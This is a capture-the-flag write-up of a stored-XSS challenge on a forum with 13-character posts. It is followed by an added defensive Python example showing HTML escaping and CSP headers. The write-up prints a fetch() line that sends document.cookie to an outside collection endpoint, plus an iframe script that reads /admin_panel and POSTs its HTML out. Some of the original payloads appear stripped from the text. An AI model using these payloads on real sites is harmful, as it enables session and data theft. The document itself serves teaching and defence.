Web task

In this task we are given the URL https://bskweb2020.0x04.net/. The site is some kind of forum: it lets us create threads and then post messages in them. We can also report a thread to the admin, which is a pretty strong hint that this is an XSS challenge.

Thread creation:

Thread with 2 messages:

Message length is very limited. There is a note on the main page: "Posts are strictly limited to 13 characters (and that includes HTML formatting automatically added by the editor)". Messages are sent using POST requests whose body has the format content=contents_of_message. The editor wraps our message in HTML tags, so the message test is sent as test wrapped in those tags. This immediately looks like a great place for XSS. And indeed, changing the payload to content= does the trick. Sending those 3 messages results in the expected alert. After reserving 4 characters for the closing and opening comment we are left with 9 characters of JS per message, which is enough to execute pretty much arbitrary code. To make my life easier, I prepared a small snippet which dynamically added

Now, all that's left is to find the flag. The first attempt was of course stealing the admin's cookies with a payload such as:

    fetch('https://mysite.com/requestbin_endpoint/bin_id?data=' + btoa(document.cookie))

Unfortunately, the admin has no cookies (or at least no cookies without the httpOnly flag). Request from the admin, as you can see the data parameter is empty:

To get the flag, we must first notice the existence of the /admin_panel endpoint. There are at least 2 ways to do that:

- If you look at the Referer header in the bot's request, it points to that exact endpoint.
- Scan the site with a tool like https://github.com/maurosoria/dirsearch; the default wordlist can locate this URL.

OK, so we probably need the contents of /admin_panel. If we look at the response headers of any endpoint, we can see that the X-Frame-Options header is set to SAMEORIGIN, which means we can almost surely load /admin_panel in an iframe and access its content. Payload that extracts /admin_panel and sends its content to my server:

    function prepareFrame() {
      var iframe = document.createElement("iframe");
      iframe.setAttribute("src", "/admin_panel");
      iframe.onload = function() {
        // Same-origin frame, so its document is readable from here
        console.log(iframe.contentWindow.document.documentElement.outerHTML);
        fetch('https://mysite.com/requestbin_endpoint/bin_id', {
          method: 'POST',
          body: btoa(iframe.contentWindow.document.documentElement.outerHTML)
        });
      };
      document.body.appendChild(iframe);
    }
    prepareFrame();

As expected, the admin sent us a request with a pretty long payload:

Decoding that base64 payload gives us the HTML code:

    Uncommunicative people forum

    Flag:

    FLAG{2bb0e8357ffff1596a8a2970ab8dbb192bee0dd6}

    Thread to be reviewed:

    No posts.

Flag: FLAG{2bb0e8357ffff1596a8a2970ab8dbb192bee0dd6}
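A defender's view of the bug, as an added example that is not part of the original write-up: the renderer the page describes (raw post content wrapped in markup, with only a 13-character limit as protection) beside an output-encoding version, plus a check that no user-supplied angle bracket survives rendering. The sample posts and the header values are constructed for illustration, not the challenge's real payloads or configuration.

```python
import html

# Constructed sample posts (not the challenge's real payloads). Each fits the
# forum's 13-character rule, which shows that a length limit alone does not
# keep markup out of the page.
SAMPLE_POSTS = ["<i>hi</i>", "</p><b>x", "plain text"]


def render_post_vulnerable(content: str) -> str:
    # What the page describes: the editor wraps the raw post in markup and
    # never encodes it, so every '<' a user sends becomes live HTML.
    return f"<p>{content}</p>"


def render_post_hardened(content: str) -> str:
    # Encode at the HTML text-node boundary. The 13-character limit stays a
    # product rule; this call is the actual security control.
    return f"<p>{html.escape(content, quote=True)}</p>"


def render_thread(posts: list, hardened: bool) -> str:
    render = render_post_hardened if hardened else render_post_vulnerable
    return "\n".join(render(p) for p in posts)


def user_markup_leaked(rendered: str, posts: list) -> bool:
    """True if any angle bracket beyond the wrapper's own <p></p> survived.

    A hardened render of N posts contains exactly 2*N tags, so any extra
    '<' or '>' must have come from user content.
    """
    expected = 2 * len(posts)
    return rendered.count("<") != expected or rendered.count(">") != expected


# Placeholder response headers that back up the encoding fix. A CSP without
# 'unsafe-inline' refuses inline <script> even if a '<' slips through;
# frame-ancestors is the CSP form of the X-Frame-Options header seen on the
# challenge and is defence in depth only, since script already running on the
# origin can read its own pages regardless of framing rules.
SECURITY_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; "
                               "frame-ancestors 'none'",
    "X-Content-Type-Options": "nosniff",
}
```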